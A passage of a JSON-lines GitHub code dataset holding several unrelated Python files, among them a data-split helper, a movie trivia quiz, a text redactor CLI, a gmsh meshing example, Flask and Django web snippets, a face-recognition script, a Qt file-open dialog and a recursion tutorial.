Needed:\n from sklearn.model_selection import train_test_split\n \n Arguments Taken:\n feature_cols: list['1','2','3'] the feature columns you want to run your model against.\n target: list the 'target' feature that you will try to predict\n train: Assign the name of your train DataFrame\n validate: Assign the name of your validate DataFrame\n test: Assign the name of your test DataFrame\n \"\"\"\n \n print('_______________________________________________________________')\n print('| DF |')\n print('|-------------------:-------------------:---------------------|')\n print('| Train | Validate | Test |')\n print('|-------------------:-------------------:---------------------|')\n print('| x_train | y_train | x_val | y_val | x_test | y_test |')\n print(':-------------------------------------------------------------:')\n \n X_train, y_train = train[feature_cols], train[target]\n X_val, y_val = validate[feature_cols], validate[target]\n X_test, y_test = test[feature_cols], test[target]\n\n print()\n print()\n print(f' X_train: {X_train.shape} {X_train.columns}')\n print(f' y_train: {y_train.shape} Index({target})')\n print()\n print(f'X_validate: {X_val.shape} {X_val.columns}')\n print(f'y_validate: {y_val.shape} Index({target})')\n print()\n print(f' X_test: {X_test.shape} {X_test.columns}')\n print(f' y_test: {y_test.shape} Index({target})')\n \n \n return X_train, y_train, X_val, y_val, X_test, y_test\n\n","repo_name":"QMCBT-JustinEvans/project-4_Individual","sub_path":"QMCBT_01_wrangle.py","file_name":"QMCBT_01_wrangle.py","file_ext":"py","file_size_in_byte":8899,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"11573236342","text":"quiz_questions = [\n {\n \"question\": \"What make is the car in which Marty Mcfly uses too\\n\"\n \"travel back in time?\\n\\n\",\n \"answers\": [\"B.M.W\", \"DMC Delorian\", \"Ford\"],\n \"correct\": \"DMC Delorian\"\n },\n {\n \"question\": \"According to Doctor Emmit Brown what makes\\n\"\n \"time travel possible?\\n\\n\",\n \"answers\": [\"The rotation of the earth \",\n \"Newtons law of motion\",\n \"The flux capacitor\"],\n \"correct\": \"The flux capacitor\"\n },\n {\n \"question\": \"How much power does the time machine need\\n\"\n \"to send Marty back in time?\\n\\n\",\n \"answers\": [\"1.21 gigawatts\", \"2000 megawatts\", \"55 volts\"],\n \"correct\": \"1.21 gigawatts\"\n },\n {\n \"question\": \"What date does Marty Mcfly travel back too?\\n\\n\",\n \"answers\": [\"September 26th 1989\",\n \"November 5th 1955\",\n \"December 25th 1965\"],\n \"correct\": \"November 5th 1955\"\n },\n {\n \"question\": \"What is the name of the dance Marty attends where\\n\"\n \"his mom and dad kiss for the first time?\\n\\n\",\n \"answers\": [\"The fish under the sea dance\",\n \"The monkey in the jungle dance\",\n \"The enchantment under the sea dance\"],\n \"correct\": \"The enchantment under the sea dance\"\n },\n {\n \"question\": \"What is the name of the mail Marty meets\\n\"\n \"Doctor Emmit Brown called?\\n\\n\",\n \"answers\": [\"Twin Pine Mall\",\n \"Lonley Pine Mall\",\n \"Westfilds\"],\n \"correct\": \"Twin Pine Mall\"\n },\n {\n \"question\": \"At what time does the lightning strike the\\n\"\n \"clock tower?\\n\\n\",\n \"answers\": [\"12:00pm\",\n \"10:50am\",\n \"10:04pm\"],\n \"correct\": \"10:04pm\"\n },\n {\n \"question\": \"What is the name of the mayor in Marty's time?\\n\\n\",\n \"answers\": [\"Mayor Goldburge Jenson\",\n \"Mayor Goldie Wilson\",\n \"Mayor Biff Tannan\"],\n \"correct\": \"Mayor Goldie Wilson\"\n },\n {\n \"question\": \"What is the name of the main antaganist?\\n\\n\",\n \"answers\": [\"Geff Bazos\",\n \"Biff Tannan\",\n \"George Mcfly\"],\n \"correct\": \"Biff Tannan\"\n },\n {\n \"question\": \"What is the name of the town Marty lives at?\\n\\n\",\n \"answers\": [\"Hill Vally\",\n \"Springfield\",\n \"Riverdale\"],\n \"correct\": \"Hill Vally\"\n },\n {\n \"question\": \"What song did Marty and his band play for\\n\"\n \"the dance auditions?\\n\\n\",\n \"answers\": [\"I will do anything for love\",\n \"Taninted love\",\n \"Power of love\"],\n \"correct\": \"Power of love\"\n },\n {\n \"question\": \"What is the name of Doc Brown's dog in 1985?\\n\\n\",\n \"answers\": [\"Einstein\",\n \"Tesla\",\n \"Newton\"],\n \"correct\": \"Einstein\"\n },\n {\n \"question\": \"What was the name of Marty's band?\\n\\n\",\n \"answers\": [\"The Who\",\n \"The Hill Vally Rockers\",\n \"The Pinheads\"],\n \"correct\": \"The Pinheads\"\n },\n {\n \"question\": \"What color was Marty's Calvin Klein underwear?\\n\\n\",\n \"answers\": [\"Red\",\n \"White\",\n \"Purple\"],\n \"correct\": \"Purple\"\n },\n {\n \"question\": \"From whom did Doc obtain the plutonium he needed\\n\"\n \"to use the time machine?\\n\\n\",\n \"answers\": [\"Russians\",\n \"English\",\n \"Lybians\"],\n \"correct\": \"Lybians\"\n },\n {\n \"question\": \"What speed does the Delorian need to reach to send\\n\"\n \"someone back or forward in time?\\n\\n\",\n \"answers\": [\"77MPH\", \"78MPH\", \"88MPH\"],\n \"correct\": \"88MPH\"\n },\n {\n \"question\": \"What did Doc Brown hit his head on when he invented\\n\"\n \"the flux capacitor?\\n\\n\",\n \"answers\": [\"The cupbord door in his kitchen\",\n \"The sink in his toilet\",\n \"The bonnet on his car\"],\n \"correct\": \"The sink in his toilet\"\n },\n {\n \"question\": \"What phrase does the Doc repeat throughout\\n\"\n \"the trilogy?\\n\\n\",\n \"answers\": [\"Great Scott!\",\n \"Na-Nu Na-Nu Shazbot\",\n \"Danger, Will Robinson\"],\n \"correct\": \"Great Scott!\"\n },\n {\n \"question\": \"What is the name of Marty's girlfriend\\n\"\n \"in Back to the Future?\\n\\n\",\n \"answers\": [\"Jennifer\",\n \"Alison\",\n \"Betty\"],\n \"correct\": \"Jennifer\"\n },\n {\n \"question\": \"What is Marty's dads motto once he\\n\"\n \"returns back from the past?\\n\\n\",\n \"answers\": [\"With great power comes great responsabilty\",\n \"You put your mind to it you can accomplish anything\",\n \"Justice delayed is justice denied.\"],\n \"correct\": \"You put your mind to it you can accomplish anything\"\n }\n]\n","repo_name":"Harriss1989/MS3_python","sub_path":"questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":5143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28737687961","text":"import argparse\nimport project1\n\nglobal final_data\nif __name__==\"__main__\":\n parser =argparse.ArgumentParser()\n parser.add_argument(\"--input\",type=str,required=True,action='append',help=\"It takes the patterns of the files\")\n parser.add_argument(\"--output\",type=str, required=True,help=\"It takes the output file path\")\n parser.add_argument(\"--names\",action=\"store_true\",help=\"It helps in redacting names\")\n parser.add_argument(\"--genders\",action=\"store_true\",help=\"It helps in redacting genders\")\n parser.add_argument(\"--dates\",action=\"store_true\",help=\"It helps in redacting dates\")\n parser.add_argument(\"--concept\",type=str,action='append',required=True,help=\"It helps in redacting concepts\")\n parser.add_argument(\"--stats\",help=\"It provides the stats of the redacted flags\")\n args=parser.parse_args()\n if args.input:\n final_data=project1.readFiles(args.input)\n #print(final_data)\n if args.names:\n final_data,names_count=project1.redact_names(final_data)\n #print(final_data)\n if args.dates:\n final_data,dates_count=project1.redact_dates(final_data)\n #print(final_data)\n if args.genders:\n final_data,gender_count=project1.redact_genders(final_data)\n #print(final_data)\n if args.concept:\n #print(args.concept)\n final_data,redacted_sentences_list,concept_words=project1.redact_concept(final_data,args.concept)\n if args.stats:\n project1.stats(args.stats)\n if args.output:\n #print(final_data)\n project1.write_output(final_data,args.output)\n\n","repo_name":"Nithivarn-Reddy/Redactor","sub_path":"project1/redactor.py","file_name":"redactor.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30026951072","text":"import gmsh\nimport sys\n\ngmsh.initialize(sys.argv)\n\nt2 = gmsh.view.add(\"Second order quad\")\n\n# coordinates of 4 quad nodes\nquad = [0., 1., 1., 0., # x\n -1.2, -1.2, -0.2, -0.2, # y\n 0., 0., 0., 0.] # z\n\n# 9 values to be interpolated 2nd order basis functions\nquad.extend([1., 1., 1., 1., 3., 3., 3., 3., -3.])\n\n# interpolation matrices c[i][j] and e[i][j] defining the d = 9\n# basis functions, i = 0, ..., d-1:\n#\n# f[i](u, v, w) = sum_(j = 0, ..., d - 1) c[i][j] u^e[j][0] v^e[j][1] w^e[j][2],\n#\n# with u, v, w the coordinates in the reference element\ngmsh.view.setInterpolationMatrices(t2, \"Quadrangle\", 9,\n [0, 0, 0.25, 0, 0, -0.25, -0.25, 0, 0.25,\n 0, 0, 0.25, 0, 0, -0.25, 0.25, 0, -0.25,\n 0, 0, 0.25, 0, 0, 0.25, 0.25, 0, 0.25,\n 0, 0, 0.25, 0, 0, 0.25, -0.25, 0, -0.25,\n 0, 0, -0.5, 0.5, 0, 0.5, 0, -0.5, 0,\n 0, 0.5, -0.5, 0, 0.5, 0, -0.5, 0, 0,\n 0, 0, -0.5, 0.5, 0, -0.5, 0, 0.5, 0,\n 0, 0.5, -0.5, 0, -0.5, 0, 0.5, 0, 0,\n 1, -1, 1, -1, 0, 0, 0, 0, 0],\n [0, 0, 0,\n 2, 0, 0,\n 2, 2, 0,\n 0, 2, 0,\n 1, 0, 0,\n 2, 1, 0,\n 1, 2, 0,\n 0, 1, 0,\n 1, 1, 0])\n\ngmsh.view.addListData(t2, \"SQ\", 1, quad)\n\n# adaptive visualization\ngmsh.view.option.setNumber(t2, \"AdaptVisualizationGrid\", 1)\ngmsh.view.option.setNumber(t2, \"TargetError\", 1e-2)\ngmsh.view.option.setNumber(t2, \"MaxRecursionLevel\", 6)\n\n# get adaptive visualization data\ndataType, numElements, data = gmsh.view.getListData(t2, returnAdaptive=True)\n\n# create discrete surface\nsurf = gmsh.model.addDiscreteEntity(2)\n\n# create nodes and elements and add them to the surface\nN = 1\nfor t in range(0, len(dataType)):\n if dataType[t] == 'SQ': # quad\n coord = []\n tags = []\n ele = []\n for q in range(0, numElements[t]):\n coord.extend([data[t][16*q+0], data[t][16*q+4], data[t][16*q+8]])\n coord.extend([data[t][16*q+1], data[t][16*q+5], data[t][16*q+9]])\n coord.extend([data[t][16*q+2], data[t][16*q+6], data[t][16*q+10]])\n coord.extend([data[t][16*q+3], data[t][16*q+7], data[t][16*q+11]])\n tags.extend([N, N+1, N+2, N+3])\n ele.extend([N, N+1, N+2, N+3])\n N = N+4\n gmsh.model.mesh.addNodes(2, 1, tags, coord)\n gmsh.model.mesh.addElementsByType(surf, 3, [], ele)\n\n# remove duplicate nodes\ngmsh.model.mesh.removeDuplicateNodes()\n\n# save mesh\ngmsh.write('test.msh')\n\n# Launch the GUI to see the results:\nif '-nopopup' not in sys.argv:\n gmsh.fltk.run()\n\ngmsh.finalize()\n","repo_name":"live-clones/gmsh","sub_path":"examples/api/view_adaptive_to_mesh.py","file_name":"view_adaptive_to_mesh.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"40"} +{"seq_id":"42285028298","text":"from flask import Flask, request\nfrom os import getenv\nimport Utils\nimport Score\n\napp = Flask(\"WOG_SCORES\")\n\n\ndef good_result(good_score):\n return ' \\\n \\\n Scores Game\\\n \\\n \\\n

    The score is
    {' + good_score + '}

    \\\n \\\n '\n\n\ndef bad_result():\n return '\\\n \\\n Scores Game\\\n \\\n \\\n

    {ERROR}

    \\\n \\\n '\n\n\n@app.route('/scores', methods=['GET', 'POST', 'DELETE'])\ndef score(inp_score=0):\n try:\n inp_score=int(request.values['score'])\n except:\n None\n if request.method == 'POST':\n try:\n rc = Score.add_score(Utils.SCORES_FILE_NAME, inp_score)\n if rc == Utils.BAD_RETURN_CODE:\n raise ValueError(\"Wrong value\")\n new_score = Score.get_score(Utils.SCORES_FILE_NAME)\n html_result = good_result(new_score)\n\n except:\n html_result = bad_result()\n\n elif request.method == 'GET':\n try:\n new_score=Score.get_score(Utils.SCORES_FILE_NAME)\n print (new_score)\n html_result = good_result(new_score)\n\n except:\n html_result=bad_result()\n elif request.method == 'DELETE':\n try:\n rc=Score.reset_score(Utils.SCORES_FILE_NAME)\n html_result = good_result(\"0\")\n\n except:\n html_result=bad_result()\n return html_result\n\n\n@app.route('/')\ndef my_func():\n return \"hello and welcome to the world of games\"\n\n\napp.run(host=\"0.0.0.0\", port=5001)\n","repo_name":"lenats03/WoG","sub_path":"MainScores.py","file_name":"MainScores.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42140365395","text":"from django.urls import path\nfrom .events import views as eventViews\nfrom .clubs import views as clubViews\nfrom .users import views as userViews\nfrom .auth import views as authViews\n\nurlpatterns = [\n path('events', eventViews.manage_events, name='events'),\n path('events/series', eventViews.list_event_series, name='events-series'),\n path('events/categories', eventViews.list_event_categories, name='events-categories'),\n path('events/headings', eventViews.list_table_headings, name='events-headings'),\n path('events/', eventViews.list_event_details, name='events-id'),\n path('clubs', clubViews.list_clubs, name='clubs'),\n path('users', userViews.create, name='users'),\n path('users/', userViews.get_profile_details, name='users-details'),\n path('auth/getToken', authViews.get_csrf_token, name='auth-get-token'),\n path('auth/getSession', authViews.get_session, name='auth-get-session'),\n path('auth/login', authViews.login_view, name='auth-login')\n]\n","repo_name":"dawidK5/FYP-Event-Mgmt","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36077013930","text":"import numpy as np\n\n\ndef NCA_ss1(self, y, ybar, muR_ref):\n \"\"\"\n This function was obtained from Dan Cogswell's fit of Samsung\n data.\n \"\"\"\n OCV = (3.86 + 1.67*y - 9.52*y**2 + 15.04*y**3 - 7.95*y**4\n - 0.06*np.log(y/(1-y)))\n muR = self.get_muR_from_OCV(OCV, muR_ref)\n actR = None\n return muR, actR\n","repo_name":"TRI-AMDD/mpet","sub_path":"mpet/electrode/materials/NCA_ss1.py","file_name":"NCA_ss1.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"40"} +{"seq_id":"8508583841","text":"import face_recognition\nimport os\nimport sys\n\nknown_labels = []\nknown_faces = []\n\nbase_path = os.getcwd() + \"/\" + sys.argv[1]\nlearning_path = base_path + \"/learning/\"\ntest_path = base_path + \"/test/\"\n\nfor file in os.listdir(learning_path):\n face = face_recognition.load_image_file(learning_path + file)\n label = file.split('.')[0]\n\n known_labels.append(label)\n known_faces.append(face_recognition.face_encodings(face)[0])\n\n\nunknown_image = face_recognition.load_image_file(test_path + os.listdir(test_path)[0])\nunknown_face_encoding = face_recognition.face_encodings(unknown_image)[0]\n\nresults = face_recognition.compare_faces(known_faces, unknown_face_encoding)\n\nfor i in range(len(results)):\n print(\"Is it {}? - {}\".format(known_labels[i], results[i]))\n","repo_name":"katebennu/face-recognition","sub_path":"one-photo-per-person/recognize.py","file_name":"recognize.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71794671800","text":"#!/usr/bin/python\n\n# [scenemanager] file_open.py\n#\n# Mike Bonnington \n# (c) 2019\n#\n# Scene Manager - Open File Dialog\n# A UI for opening files/scenes/scripts.\n\n\nimport datetime\n# import fnmatch\n# import glob\nimport os\nimport re\n# import sys\n# import time\n# import traceback\n\nfrom Qt import QtCore, QtGui, QtWidgets\n\n# Import custom modules\nimport ui_template as UI\n\nfrom . import convention\nfrom shared import os_wrapper\n# from shared import recent_files\nfrom shared import verbose\n\n# ----------------------------------------------------------------------------\n# Configuration\n# ----------------------------------------------------------------------------\n\nVERSION = \"0.1.0\"\n\ncfg = {}\n\n# Set window title and object names\ncfg['window_object'] = \"fileOpenUI\"\nif os.environ['SCNMGR_VENDOR_INITIALS']:\n\tcfg['window_title'] = \"%s Open\" % os.environ['SCNMGR_VENDOR_INITIALS']\nelse:\n\tcfg['window_title'] = \"Open\"\n\n# Set the UI and the stylesheet\ncfg['ui_file'] = 'file_open.ui'\ncfg['stylesheet'] = 'style.qss' # Set to None to use the parent app's stylesheet\n\n# Other options\ncfg['prefs_file'] = os.path.join(\n\tos.environ['SCNMGR_USER_PREFS_DIR'], 'scenemanager_prefs.json')\ncfg['store_window_geometry'] = True\n\n# ----------------------------------------------------------------------------\n# Begin main window class\n# ----------------------------------------------------------------------------\n\nclass FileOpenUI(QtWidgets.QDialog, UI.TemplateUI):\n\t\"\"\" File Open UI.\n\t\"\"\"\n\tdef __init__(self, parent=None, session=None):\n\t\tsuper(FileOpenUI, self).__init__(parent)\n\t\tself.parent = parent\n\t\tself.session = session\n\n\t\tself.base_dir = os.environ['SCNMGR_SAVE_DIR']\n\t\tself.file_ext = os.environ['SCNMGR_FILE_EXT'].split(os.pathsep)\n\n\t\tself.setupUI(**cfg)\n\t\tself.conformFormLayoutLabels(self.ui)\n\n\t\t# Set window icon, flags and other Qt attributes\n\t\tself.setWindowFlags(QtCore.Qt.Dialog)\n\n\t\t# Set icons\n\t\tself.ui.shot_toolButton.setIcon(self.iconSet('filmgrain.svg'))\n\t\tself.ui.refresh_toolButton.setIcon(self.iconSet('icon_refresh.png'))\n\t\tself.ui.nativeDialog_toolButton.setIcon(self.iconSet('folder-open.svg'))\n\n\t\t# Connect signals & slots\n\t\t# self.ui.shot_toolButton.clicked.connect(self.setShot)\n\t\t# self.ui.shotChange_toolButton.clicked.connect(self.setShot)\n\t\t# self.ui.shotReset_toolButton.clicked.connect(self.resetShot)\n\n\t\t# self.ui.shot_lineEdit.textChanged.connect(self.updateFilters) # disabled as this call should be done explicitly when shot is (re)set\n\t\tself.ui.discipline_comboBox.currentIndexChanged.connect(self.updateFilters)\n\t\tself.ui.artist_comboBox.currentIndexChanged.connect(self.updateFilters)\n\t\tself.ui.versionAll_radioButton.toggled.connect(self.updateView)\n\t\tself.ui.versionLatest_radioButton.toggled.connect(self.updateView)\n\n\t\tself.ui.refresh_toolButton.clicked.connect(self.updateView)\n\t\tself.ui.nativeDialog_toolButton.clicked.connect(self.nativeDialog)\n\n\t\tself.ui.fileBrowser_treeWidget.itemSelectionChanged.connect(self.updateSelection)\n\n\t\tself.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Open).clicked.connect(self.openFile)\n\t\tself.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Cancel).clicked.connect(self.close)\n\n\t\t# # Context menus\n\t\t# self.addContextMenu(self.ui.shot_toolButton, \"Change\", self.setShot)\n\t\t# self.addContextMenu(self.ui.shot_toolButton, \"Reset to current\", self.resetShot)\n\n\t\t# Restore widget state\n\t\tself.restoreView()\n\n\t\t# Define global variables\n\t\tself.time_format_str = \"%Y/%m/%d %H:%M:%S\"\n\n\t\t# # Show initialisation message\n\t\t# info_ls = []\n\t\t# for key, value in self.getInfo().items():\n\t\t# \tinfo_ls.append(\"{} {}\".format(key, value))\n\t\t# info_str = \" | \".join(info_ls)\n\t\t# verbose.message(\"%s v%s\" % (cfg['window_title'], VERSION))\n\t\t# verbose.print_(info_str)\n\n\n\tdef display(self):\n\t\t\"\"\" Display the window.\n\t\t\"\"\"\n\t\tself.returnValue = False\n\n\t\tself.setWindowTitle(\"%s - %s\" % (cfg['window_title'], os.environ['SCNMGR_JOB']))\n\n\t\tself.ui.shot_lineEdit.setText(os.environ['SCNMGR_SHOT']) #.replace('/', '_')\n\t\tself.ui.shot_toolButton.setEnabled(False) # temp until implemented\n\n\t\tself.populateComboBox(\n\t\t\tself.ui.discipline_comboBox, \n\t\t\tself.getDisciplines(), \n\t\t\tblockSignals=True)\n\n\t\tself.populateComboBox(\n\t\t\tself.ui.artist_comboBox, \n\t\t\tself.getArtists(), \n\t\t\tblockSignals=True)\n\n\t\tself.updateFilters()\n\t\t# self.updateView() # already called from updateFilters()\n\t\tself.updateSelection()\n\n\t\tself.show()\n\t\tself.raise_()\n\n\t\treturn self.returnValue\n\n\n\t# @QtCore.Slot()\n\tdef updateSelection(self):\n\t\t\"\"\" Enable/disable 'Open' button depending on current selection.\n\t\t\"\"\"\n\t\t# No items selected...\n\t\tif len(self.ui.fileBrowser_treeWidget.selectedItems()) == 0:\n\t\t\tself.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Open).setEnabled(False)\n\t\t# More than one item selected...\n\t\telse:\n\t\t\tself.ui.buttonBox.button(QtWidgets.QDialogButtonBox.Open).setEnabled(True)\n\n\n\t# @QtCore.Slot()\n\tdef updateFilters(self):\n\t\t\"\"\" Update the search filter arguments when the widgets' values are\n\t\t\tmodified.\n\t\t\"\"\"\n\t\tshot = self.ui.shot_lineEdit.text().replace('/', '_')\n\t\tdiscipline = self.ui.discipline_comboBox.currentText()\n\t\tartist = self.ui.artist_comboBox.currentText()\n\n\t\t# self.generateFilter(shot, discipline, artist)\n\t\tself.file_filter = convention.generate_filter(\n\t\t\tshot=shot, \n\t\t\tdiscipline=discipline, \n\t\t\tartist=artist)\n\t\tself.updateView()\n\n\n\tdef updateView(self):\n\t\t\"\"\" Update the file browser.\n\t\t\"\"\"\n\t\ttry:\n\t\t\tverbose.debug(\"updateView called from %s\" % self.sender().objectName())\n\t\texcept:\n\t\t\tverbose.debug(\"updateView called explicitly\")\n\n\t\tshow_latest = self.ui.versionLatest_radioButton.isChecked()\n\n\t\t# Clear tree widget\n\t\tself.ui.fileBrowser_treeWidget.clear()\n\n\t\t# Generate a master list of all files matching the naming convention\n\t\t# to compare against\n\t\tmatches_latest = convention.get_latest(\n\t\t\tconvention.match_files(\n\t\t\t\tself.base_dir, \n\t\t\t\tconvention.generate_filter(\n\t\t\t\t\tshot=self.ui.shot_lineEdit.text().replace('/', '_'))))\n\n\t\t# Get list of files that match filters\n\t\t# matches = self.matchFiles(self.file_filter)\n\t\tmatches = convention.match_files(self.base_dir, self.file_filter)\n\t\t# matches_latest = convention.get_latest(matches)\n\n\t\tif show_latest:\n\t\t\t# matches = matches_latest\n\t\t\tmatches = convention.get_latest(matches)\n\n\t\t# Add entries to tree widget\n\t\tfor item in matches:\n\t\t\tfileItem = QtWidgets.QTreeWidgetItem(self.ui.fileBrowser_treeWidget)\n\t\t\tif item in matches_latest:\n\t\t\t\tfileItem.setIcon(0, self.iconSet('starred.svg'))\n\t\t\telse:\n\t\t\t\tfileItem.setIcon(0, self.iconSet('empty.png'))\n\t\t\t\tfileItem.setForeground(0, self.col['disabled'])\n\t\t\tfileItem.setText(0, os.path.basename(item))\n\t\t\tfileItem.setText(1, str(os.path.getsize(item)))\n\t\t\ttimestamp = os.path.getmtime(item)\n\t\t\ttimestr = datetime.datetime.fromtimestamp(timestamp).strftime(self.time_format_str)\n\t\t\tfileItem.setText(2, timestr)\n\t\t\tif self.getArtist(item) != os.environ['SCNMGR_USER']:\n\t\t\t\tfileItem.setForeground(3, self.col['disabled'])\n\t\t\tfileItem.setText(3, self.getArtist(item))\n\t\t\tfileItem.setText(4, os.path.normpath(item))\n\n\t\t\tself.ui.fileBrowser_treeWidget.addTopLevelItem(fileItem)\n\n\t\t# Hide last column\n\t\tself.ui.fileBrowser_treeWidget.setColumnHidden(4, True)\n\n\t\t# Sort by submit time column - move this somewhere else?\n\t\t# self.ui.fileBrowser_treeWidget.sortByColumn(2, QtCore.Qt.DescendingOrder)\n\n\n\tdef getDisciplines(self):\n\t\t\"\"\" Return a list of disciplines.\n\t\t\"\"\"\n\t\tfrom shared import disciplines\n\t\treturn [\"[any]\"] + disciplines.disciplines\n\n\n\tdef getArtists(self):\n\t\t\"\"\" Return a list of artists. Calculate from all the subdirectories\n\t\t\tof base dir plus the current username.\n\t\t\"\"\"\n\t\tartists = [\"[any]\", os.environ['SCNMGR_USER']]\n\n\t\tsubdirs = next(os.walk(self.base_dir))[1]\n\t\tif subdirs:\n\t\t\tfor subdir in subdirs:\n\t\t\t\tif not subdir.startswith('.'): # ignore hidden directories\n\t\t\t\t\tif subdir not in artists:\n\t\t\t\t\t\tartists.append(subdir)\n\n\t\treturn artists\n\n\n\tdef getArtist(self, filepath):\n\t\t\"\"\" Return the artist name based on the filepath.\n\t\t\"\"\"\n\t\t# dirname = os.path.dirname(filepath)\n\t\t# artist = os.path.split(dirname)[-1]\n\t\t# return artist\n\t\tmeta = convention.parse(filepath)\n\t\treturn meta['']\n\n\n\tdef restoreView(self):\n\t\t\"\"\" Restore and apply saved state of tree widgets.\n\t\t\"\"\"\n\t\ttry:\n\t\t\t# self.ui.splitter.restoreState(self.settings.value(\"splitterSizes\")) #.toByteArray())\n\t\t\tself.ui.fileBrowser_treeWidget.header().restoreState(self.settings.value(\"fileBrowserView\")) #.toByteArray())\n\t\texcept:\n\t\t\tpass\n\n\n\t# def resetView(self):\n\t# \t\"\"\" Reset state of tree widgets to default.\n\t# \t\"\"\"\n\t# \tself.settings.remove(\"fileBrowserView\")\n\n\n\tdef openFile(self):\n\t\t\"\"\" Dialog accept function.\n\t\t\"\"\"\n\t\ttry:\n\t\t\tfor item in self.ui.fileBrowser_treeWidget.selectedItems():\n\t\t\t\tfilename = item.text(4)\n\n\t\texcept ValueError:\n\t\t\tverbose.error(\"Nothing selected.\")\n\t\t\treturn False\n\n\t\tif self.session.file_open(filename):\n\t\t\tself.returnValue = filename\n\t\t\tself.accept()\n\n\n\tdef nativeDialog(self):\n\t\t\"\"\" Open file using application-native dialog.\n\t\t\"\"\"\n\t\tself.hide()\n\n\t\tif self.session.file_open_native_dialog():\n\t\t\tself.close()\n\t\telse: # Return to custom dialog\n\t\t\tself.show()\n\n\n\t# def keyPressEvent(self, event):\n\t# \t\"\"\" Override function to prevent Enter / Esc keypresses triggering\n\t# \t\tOK / Cancel buttons.\n\t# \t\"\"\"\n\t# \tif event.key() == QtCore.Qt.Key_Return \\\n\t# \tor event.key() == QtCore.Qt.Key_Enter:\n\t# \t\treturn\n\n\n\tdef closeEvent(self, event):\n\t\t\"\"\" Event handler for when window is closed. Save settings, store\n\t\t\twindow gemotry and state of certain widgets\n\t\t\"\"\"\n\t\tself.save()\n\t\tself.storeWindow()\n\t\tself.settings.setValue(\n\t\t\t\"fileBrowserView\", \n\t\t\tself.ui.fileBrowser_treeWidget.header().saveState())\n\n# ----------------------------------------------------------------------------\n# End of main window class\n# ============================================================================\n# Run functions\n# ----------------------------------------------------------------------------\n\ndef dialog(session, app='standalone'):\n\t\"\"\" Instantiate UI object parented to appropriate app's main window\n\t\"\"\"\n\tif app == 'standalone':\n\t\tpass\n\telif app == 'maya':\n\t\tparent = UI._maya_main_window()\n\telif app == 'houdini':\n\t\tparent = UI._houdini_main_window()\n\telif app == 'nuke':\n\t\tparent = UI._nuke_main_window()\n\n\treturn FileOpenUI(parent=parent, session=session)\n","repo_name":"mjbonnington/icarus-gps","sub_path":"tools/scenemanager/file_open.py","file_name":"file_open.py","file_ext":"py","file_size_in_byte":10259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43987717516","text":"import networkx as nx\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass CommunityNetworkBuild(object):\n def __init__(self, nodes, M, pin, pout):\n \"\"\"\n :param nodes:网络节点数\n :param M: 社区个数\n :param M_nodes: 每个社区节点数\n :param pin: 社区内部连边概率\n :param pout: 社区间连边概率\n \"\"\"\n self.nodes = nodes\n self.M = M\n self.M_nodes = self.nodes/self.M\n self. pin = pin\n self.out = pout\n\n\ndef main():\n CommunityNetworkBuild(128, 8, 0.7, 0.01)\n\nif __name__ == '__main__':\n main()\n","repo_name":"ArvinYan26/Python_Learning","sub_path":"1. 2020年学习/5月份学习/1. 第一, 二 周学习/3. 函数,面向对象实现分类(5月4号)/面向对象构建社区网络.py","file_name":"面向对象构建社区网络.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73295375479","text":"# # Recursions\r\n# def print2(str1):\r\n# print2(str1)\r\n# print( \"this is \"+ str1)\r\n# print2(\"tushar\")\r\n#\r\n# # if we are using the function print2(str1) inside this function then it'\r\n# # s giving recursion error\r\n# Now we are making a new function called factorial\r\ndef factorial_iterative(r):\r\n '''\r\n\r\n :param r:Integer\r\n :return: n*n-1 * n-2 * n-3.........1\r\n '''\r\n fac =1\r\n for i in range(r):\r\n fac = fac *(i+1)\r\n return(fac)\r\n\r\n\r\n# formula of factorial = 5*4*3*2*1\r\n# n! = n*n-1*n-2*n-3.....1\r\n# n! = n *(n-1)!\r\nnumber = int(input(\"enter the number:\"))\r\nprint(\"Factorial of the number using iterative method\",factorial_iterative(number))\r\n# Now we make the function using recursive method\r\ndef factorial_recursive(r):\r\n '''\r\n\r\n :param r:Integer\r\n :return: n*n-1 * n-2 * n-3.........1\r\n '''\r\n if r==1:\r\n return 1\r\n else:\r\n return r * factorial_recursive(r-1)\r\n # Logic of this function\r\n# 5 * factorial_recursive(4)\r\n# 5 * 4 * factorial_recursive(3)\r\n# 5 * 4*3factorial_recursive(2)\r\n# 5*4*3*2*factorial_recursive(1)\r\n# 5*4*3*2*1 = 120\r\nnum = int(input(\"enter the number:\"))\r\nprint(\"Factorial of the number using recursive method\",factorial_recursive(num))\r\ndef tri_recursion(k):\r\n if(k>0):\r\n result = k+tri_recursion(k-1)\r\n print(result)\r\n else:\r\n result = 0\r\n return result\r\nx = int(input(\"enter the number of your choice\"))\r\nprint(\"\\n\\nRecursion Example Results\")\r\nprint(tri_recursion(x))","repo_name":"tush-tr/python-practice-projects","sub_path":"learning-stuff-for-python-basic/py_tuts/tut34_recursion.py","file_name":"tut34_recursion.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} 